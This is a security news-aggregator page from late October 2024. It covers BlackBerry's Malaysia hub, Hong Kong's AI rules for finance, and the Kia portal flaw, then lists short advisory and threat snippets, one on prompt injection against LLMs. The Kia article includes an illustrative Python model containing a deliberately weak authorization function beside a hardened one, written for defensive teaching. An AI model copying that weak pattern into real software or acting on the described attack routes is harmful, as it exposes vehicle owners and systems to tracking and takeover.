Tash Stamatelos, BlackBerry's Vice President for Cybersecurity in APAC, emphasized the importance of Malaysia as a strategic market. “As the nation prepares to chair ASEAN in 2024, we commend Malaysia's proactive measures in fostering digital transformation and regional collaboration in cybersecurity,” he stated. Stamatelos highlighted Malaysia's ongoing investments in skills development, innovation, and infrastructure as key factors that make it an attractive destination for global companies, including BlackBerry.

The BlackBerry APAC HQ in Malaysia is home to a diverse team of specialists encompassing sales, marketing, threat research, technical support, and professional services. This team, including several experienced cybersecurity trainers, is dedicated to empowering cyber-defenders in Malaysia and across the region.

Communications Minister Fahmi Fadzil expressed strong support for the establishment of the BlackBerry APAC HQ in Malaysia, indicating that it would serve not only Malaysia but the wider APAC region by leveraging BlackBerry's advanced cybersecurity solutions. “This initiative represents a significant step toward enhancing regional cybersecurity and driving innovation,” he noted.

BlackBerry Plans for Cybersecurity Enhancements in Malaysia

Recently, BlackBerry received recognition for its commitment to capacity building and cyber-resilience, winning the Cyber Security (Service) Innovation accolade at Malaysia's Cyber Security Awards 2024 on August 8. This award reflects the company’s dedication to supporting Malaysia’s ambition of becoming a secure digital nation.

On October 23, 2024, BlackBerry furthered its commitment to cybersecurity education in Malaysia by partnering with the International Information System Security Certification Consortium (ISC2). This collaboration aims to deliver globally recognized cybersecurity training and certifications as part of the BlackBerry Cybersecurity Curriculum at the CCoE.

With the Malaysian government focused on enhancing digital skills, the introduction of ISC2 courses will provide valuable opportunities for professionals in the cybersecurity field.

Han Ther Lee, Director of Education and Training at the CCoE, highlighted the importance of this partnership. “As Malaysia gears up for the 'Year of Skills' in 2025, we are committed to working alongside the government and industry to educate and grow the nation’s cybersecurity workforce,” he said. The courses will include critical certifications such as Certified Information Systems Security Professional (CISSP) and Certified Cloud Security Professional (CCSP), essential for strengthening national and regional cybersecurity capabilities.

Cigdem Bildirici, Vice President of Business Development at ISC2, also expressed enthusiasm for the partnership, noting the vital need to bolster the cybersecurity workforce amid increasing digital connectivity and associated risks in Malaysia.

Since its inception in March 2024, the Cybersecurity Center of Excellence has trained over 1,500 professionals, dedicating more than 8,000 hours to skill development. With the addition of ISC2 programs, the CCoE is set to expand significantly.


 Business News

Hong Kong has unveiled its first guidelines for the "responsible" application of artificial intelligence (AI) in the financial sector. Announced during the annual FinTech Week, these AI guidelines aim to help financial institutions harness AI’s transformative potential while safeguarding data privacy, cybersecurity, and intellectual property. By leading this initiative, the Hong Kong government is setting a regulatory framework to balance innovation with caution, ensuring the technology’s sustainable integration into banking, asset management, and other financial services.

The AI guidelines require banks, brokers, asset managers, and other financial institutions to establish an AI governance strategy, advising on how AI should be implemented and used. Institutions must also adopt a risk-based approach in managing AI systems and maintain human oversight to mitigate potential risks.

“As an international financial centre, Hong Kong’s market is both open and prudent in embracing AI,” said Financial Secretary Paul Chan. “Our policy clearly sets forth the government’s stance on AI's responsible application in finance. We aim to leverage Hong Kong’s unique position as a connector between the Mainland and international markets, and with the free flow of information, we can accelerate development and productivity tailored to local needs.”

Key Points of Hong Kong's AI Guidelines

The AI policy statement, delivered jointly by Hong Kong’s top financial and technology officials, highlights the government's perspective on AI as a "data-driven, double-edged, and dynamic" tool. This view acknowledges both the opportunities and challenges AI presents, particularly in areas such as cybersecurity and privacy. Some of the main points outlined in the policy are:

Dual-Track Development: Recognizing AI’s potential and associated risks, the government plans to follow a dual-track approach. This means promoting AI’s growth in finance while addressing challenges around cybersecurity, data protection, and intellectual property rights.

AI Governance Strategy: Financial institutions are encouraged to create strong governance strategies for AI, focusing on a risk-based approach in procurement, usage, and management. Human oversight remains a critical component in overseeing these AI systems.

Support from Local Universities: The Hong Kong University of Science and Technology (HKUST) will make its self-developed AI model and computing resources available to financial institutions, offering both advisory and training services. This collaboration underscores Hong Kong’s commitment to building a solid AI infrastructure that aligns academic resources with industry needs.

Regulatory Vigilance and Adaptation: As AI technology rapidly evolves, financial regulators will continue reviewing and updating regulations to ensure alignment with international practices, such as the shift toward explainable AI.

Strengthening Cyber Policing and Public Education: In partnership with international organizations, Hong Kong's police will work to strengthen cyber policing efforts. Additionally, the Investor and Financial Education Council will launch initiatives to educate the public on AI's impact on retail investing and financial management.

FinTech Week Emphasizes AI and Hong Kong’s Global Role

Hong Kong’s FinTech Week, hosted by InvestHK and Finoverse, has become a significant event for the region's finance and tech industries. Now in its ninth year, the conference runs from October 28 to November 1, attracting 700 companies and highlighting Hong Kong's position as a strategic link between global businesses and China, the world’s second-largest AI market.

At the event, Secretary for Financial Services and the Treasury Christopher Hui highlighted the government’s commitment to fostering a “healthy and sustainable” AI-driven market. “We encourage financial institutions to seize AI’s opportunities, as it can advance Hong Kong’s reputation as a high-quality, international financial hub,” he said. Hui also noted that numerous AI models and infrastructure are available for financial firms to leverage, emphasizing that these resources could support institutions in meeting both local and global challenges.

To emphasize Hong Kong’s commitment to AI, Hui showcased an AI avatar developed locally, a symbolic step for Hong Kong’s future in digital technology. “We want our financial sector to make full use of these AI resources,” Hui added, emphasizing the role of the industry in driving sustainable growth and competitiveness in the region.

AI Applications on the Rise: HSBC’s Perspective

AI’s rapid adoption in finance is already in motion, with applications in enhancing productivity, customer service, programming, and even coding. In a fireside chat during FinTech Week, Luanne Lim, CEO of HSBC Hong Kong, highlighted the extensive usage of generative AI (GenAI) within the bank. According to Lim, HSBC is exploring over 100 GenAI use cases to streamline its services and boost client-facing functions.

“Generative AI brings significant benefits, but not without its own risks and limitations,” said Lim, who also chairs the Hong Kong Association of Banks. “This is where regulation plays an important role, and we welcome the government’s policy.”

For HSBC, AI offers a competitive edge, but it also requires collaboration across the industry to build a robust and trusted digital ecosystem. Lim believes that Hong Kong’s ambition to become a global digital innovation hub will succeed only through collaboration. “The future of AI in finance depends on a collaborative, rather than competitive, approach. A strong ecosystem will help drive digital transformation while ensuring responsible AI practices,” she added.

Balancing Innovation with Security

AI’s adoption in financial services holds considerable promise for Hong Kong, but it also raises cybersecurity and ethical concerns. By emphasizing the importance of a dual-track approach and prioritizing public education, the Hong Kong government aims to balance innovation with precaution.

The Investor and Financial Education Council, a government initiative, will work on public outreach programs to raise awareness about AI’s impact on retail investment and personal finance. These efforts aim to help citizens navigate AI-driven products responsibly while understanding the associated risks.

With this new framework, Hong Kong aspires to lead by example in integrating AI responsibly into financial services. The AI policy reflects the government's understanding that while AI can drive growth and efficiency, it must be managed with oversight and vigilance. As Hong Kong moves forward with its AI strategy, it sets a precedent for other financial centers seeking to embrace technological advancements without compromising security and ethical standards.


 Privacy

A group of security researchers discovered a serious vulnerability in the web portal of the South Korean car manufacturer Kia, which allowed cars to be hacked remotely and their owners tracked. To carry out the hack, only the victim's car license plate number was needed. Let's dive into the details.

Overly connected cars

If you think about it, in the last couple of decades, cars have essentially become big computers on wheels. Even the less smart models are packed with electronics and equipped with a range of sensors — from sonars and cameras to motion detectors and GPS. And not only that; in recent years, these computers have been constantly connected to the internet — with all the ensuing risks.

Not long ago, we wrote about how today's cars collect huge amounts of data about their owners and send it to the manufacturer. Moreover, the manufacturers also sell this collected data to other companies — particularly insurers. However, there's another side to this issue: being constantly connected to the internet means that, if there are vulnerabilities — either in the car itself or in the cloud system it communicates with — someone could exploit them to hack the system and track the car's owner without the manufacturer even knowing.

[Image: The so-called head unit of a car is just the tip of the iceberg; in fact, today's cars are stuffed with electronics]

One bug to rule them all, one bug to find them

This is exactly what happened in this case. Researchers found a vulnerability in Kia's web portal, which is used by Kia owners and dealers. It turned out that by using the API, the portal allowed anyone to register as a car dealer with just a few fairly simple moves.

[Image: The Kia portal in which a serious vulnerability was discovered]

This gave the attacker access to features that even car dealers shouldn't have — at least, not once the vehicle has been handed over to the customer. Specifically, the portal permits first finding any Kia car, and then accessing the owner's data (name, phone number, email address, and even physical address) — all with just the vehicle's VIN. It should be noted that VINs aren't exactly secret information — in some countries, they're publicly available. For instance, in the USA there are many online services you can use to look up a VIN using a car's license plate number.

[Image: A general scheme of the Kia web portal attack, allowing control over any car using its VIN]

After successfully finding the car, the attacker can use the owner's data to register any attacker-controlled account in Kia's system as a new user for the vehicle. From there, the attacker would gain access to various functions normally available to the car's actual owner through the mobile app.

What's particularly interesting is that all these features weren't just available to the dealer who sold that car, but to any dealer registered in Kia's system.

Hacking a car in seconds

The researchers then developed an experimental app that could take control of any Kia vehicle within seconds simply by entering its license plate number into the input fields. The app would automatically find the car's VIN through the relevant service and use it to register the vehicle to the researchers' account.

[Image: The researchers even created a handy app to simplify hacking — all you need is the Kia car's license plate number]

After that, a single button press in the app would allow the attacker to obtain the vehicle's current coordinates, lock or unlock the doors, start or stop the engine, or honk the horn.

[Image: The app could be used to obtain the hacked car's coordinates and send commands]

It's important to note that in most cases these functions wouldn't be enough to steal the car. Modern models are usually equipped with immobilizers, which require the physical presence of the key to be disabled. There are some exceptions, but generally these are the cheapest cars that are unlikely to be of much interest to thieves. Nevertheless, this vulnerability could easily be used to track the car owner, steal valuables left inside the car (or plant something there), or simply disrupt the driver's life with unexpected actions from the vehicle.

The researchers followed responsible disclosure protocol, informing the manufacturer of the issue and only publishing their findings after Kia fixed the bug. However, they note that they've found similar vulnerabilities before and are confident they'll continue to discover more in the future.
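The root cause the article describes is an authorization gap, not a cryptographic or memory-safety bug: the portal checked that a caller held the "dealer" role but not whether that particular dealer was entitled to act on that particular vehicle, and it handed the owner's contact data back as part of the response. The following Python model is an added illustration written for this page; it is not code from the researchers, from Kia, or from the original post, and every name in it (the `Account` and `Vehicle` records, `weak_register_user`, `hardened_register_user`, the placeholder VINs and dealer IDs) is a constructed assumption. It contrasts the role-only check with an object-level check that ties a dealer to the vehicles they sold and only until handover, and that returns the same error for "unknown VIN" and "not yours" so VIN probing reveals nothing.

```python
from dataclasses import dataclass, field
from enum import Enum, auto
from typing import Dict, Optional, Set

class Role(Enum):
    DEALER = auto()
    OWNER = auto()

class Forbidden(Exception):
    """Raised when an actor may not touch a vehicle record."""

@dataclass
class Account:
    account_id: str
    role: Role
    verified: bool = False          # dealer identity confirmed out of band
    dealer_id: Optional[str] = None

@dataclass
class Vehicle:
    vin: str
    selling_dealer: str
    delivered: bool                 # already handed over to the customer?
    owner_id: Optional[str] = None
    owner_contact: Dict[str, str] = field(default_factory=dict)
    users: Set[str] = field(default_factory=set)

def weak_register_user(vehicles, actor, vin, new_user_id):
    """Weak variant (hypothetical): role check only. Any DEALER account,
    verified or not, can attach a user to any VIN and gets the owner's
    contact data back in the response."""
    if actor.role is not Role.DEALER:
        raise Forbidden("dealer role required")
    vehicle = vehicles[vin]         # the VIN alone selects the object
    vehicle.users.add(new_user_id)
    return dict(vehicle.owner_contact)

def can_manage_vehicle(actor, vehicle):
    """Object-level check: may this actor change this vehicle's users now?"""
    if actor.role is Role.OWNER:
        return actor.account_id == vehicle.owner_id
    if actor.role is Role.DEALER and actor.verified:
        # Only the selling dealer, and only until the car is handed over.
        return actor.dealer_id == vehicle.selling_dealer and not vehicle.delivered
    return False                    # self-registered dealers get nothing

def hardened_register_user(vehicles, actor, vin, new_user_id):
    """Hardened variant (hypothetical): authorization before any change."""
    vehicle = vehicles.get(vin)
    if vehicle is None or not can_manage_vehicle(actor, vehicle):
        # One error for "unknown VIN" and "not yours", so probing VINs
        # does not reveal which vehicles exist.
        raise Forbidden("not authorised for this vehicle")
    vehicle.users.add(new_user_id)
    # Owner contact details are deliberately not part of the response.

def build_fleet():
    """Constructed sample data; VINs and contacts are placeholders."""
    return {
        "VIN-DELIVERED-0001": Vehicle("VIN-DELIVERED-0001", "D-100", True,
                                      "owner-1", {"email": "owner1@example.invalid"}),
        "VIN-ON-LOT-0002": Vehicle("VIN-ON-LOT-0002", "D-100", False),
    }

def attempt(fn, actor, vin, new_user_id):
    """Run one registration against a fresh fleet; report allowed/denied."""
    try:
        fn(build_fleet(), actor, vin, new_user_id)
        return "allowed"
    except Forbidden:
        return "denied"

def demo():
    """Compare both variants for the kinds of actors the article mentions."""
    self_registered = Account("acct-x", Role.DEALER, False, "D-999")
    other_dealer = Account("acct-y", Role.DEALER, True, "D-200")
    selling_dealer = Account("acct-z", Role.DEALER, True, "D-100")
    owner = Account("owner-1", Role.OWNER)
    sold, on_lot = "VIN-DELIVERED-0001", "VIN-ON-LOT-0002"
    return {
        "weak: self-registered dealer, sold car": attempt(weak_register_user, self_registered, sold, "m"),
        "hardened: self-registered dealer, sold car": attempt(hardened_register_user, self_registered, sold, "m"),
        "hardened: other verified dealer, sold car": attempt(hardened_register_user, other_dealer, sold, "m"),
        "hardened: selling dealer, sold car": attempt(hardened_register_user, selling_dealer, sold, "m"),
        "hardened: selling dealer, car on lot": attempt(hardened_register_user, selling_dealer, on_lot, "buyer"),
        "hardened: current owner, sold car": attempt(hardened_register_user, owner, sold, "spouse"),
    }

if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{outcome:8} {case}")
```

Two design choices carry the weight here. First, the check is made per object (this actor, this vehicle, this point in the vehicle's life cycle), which is what a role flag alone cannot express; the article's observation that any registered dealer could act on any car is exactly the case the role-only version allows. Second, the response to a user-registration call contains no owner contact data at all, so even a future authorization mistake would not turn into the name-address-phone disclosure described above.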


 Feed

LLMs tend to miss the forest for the trees, understanding specific instructions but not their broader context. Bad actors can take advantage of this myopia to get them to do malicious things, with a new prompt-injection technique.

 Feed

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high-level filter/pipe message-processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current 3.x.x release.

 Feed

Debian Linux Security Advisory 5799-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

 Feed

Debian Linux Security Advisory 5798-1 - Christopher L. Shannon discovered that the implementation of the OpenWire protocol in Apache ActiveMQ was susceptible to the execution of arbitrary code.

 Feed

Debian Linux Security Advisory 5797-1 - Multiple security issues were found in Twisted, an event-based framework for internet applications, which could result in incorrect ordering of HTTP requests or cross-site scripting.

 Feed

Debian Linux Security Advisory 5796-1 - Multiple security issues were found in libheif, a library to parse HEIF and AVIF files, which could result in denial of service or potentially the execution of arbitrary code.

 Feed

Red Hat Security Advisory 2024-8235-03 - Red Hat OpenShift Container Platform release 4.14.39 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include code execution, denial of service, and out of bounds write vulnerabilities.

 Feed

A new attack technique could be used to bypass Microsoft's Driver Signature Enforcement (DSE) on fully patched Windows systems, leading to operating system (OS) downgrade attacks. "This bypass allows loading unsigned kernel drivers, enabling attackers to deploy custom rootkits that can neutralize security controls, hide processes and network activity, maintain stealth, and much more," SafeBreach

 Feed

Cybersecurity news can sometimes feel like a never-ending horror movie, can't it? Just when you think the villains are locked up, a new threat emerges from the shadows. This week is no exception, with tales of exploited flaws, international espionage, and AI shenanigans that could make your head spin. But don't worry, we're here to break it all down in plain English and arm you with the

 Feed

Cybersecurity researchers have warned of a spike in phishing pages created using a website builder tool called Webflow, as threat actors continue to abuse legitimate services like Cloudflare and Microsoft Sway to their advantage. "The campaigns target sensitive information from different crypto wallets, including Coinbase, MetaMask, Phantom, Trezor, and Bitbuy, as well as login credentials for

 Feed

Operational Technology (OT) security has affected marine vessel and port operators, since both ships and industrial cranes are being digitalized and automated at a rapid pace, ushering in new types of security challenges. Ships come to shore every six months on average. Container cranes are mostly automated. Diagnostics, maintenance, upgrade and adjustments to these critical systems are done

 Feed

A government entity and a religious organization in Taiwan were the target of a China-linked threat actor known as Evasive Panda that infected them with a previously undocumented post-compromise toolset codenamed CloudScout. "The CloudScout toolset is capable of retrieving data from various cloud services by leveraging stolen web session cookies," ESET security researcher Anh Ho said. "Through

 Feed

A suspected Russian hybrid espionage and influence operation has been observed delivering a mix of Windows and Android malware to target the Ukrainian military under the Telegram persona Civil Defense. Google's Threat Analysis Group (TAG) and Mandiant are tracking the activity under the name UNC5812. The threat group, which operates a Telegram channel named civildefense_com_ua, was created on

 Feed

Three malicious packages published to the npm registry in September 2024 have been found to contain a known malware called BeaverTail, a JavaScript downloader and information stealer linked to an ongoing North Korean campaign tracked as Contagious Interview. The Datadog Security Research team is monitoring the activity under the name Tenacious Pungsan, which is also known by the monikers

Aggregator history: 2024-10, Monday, October 28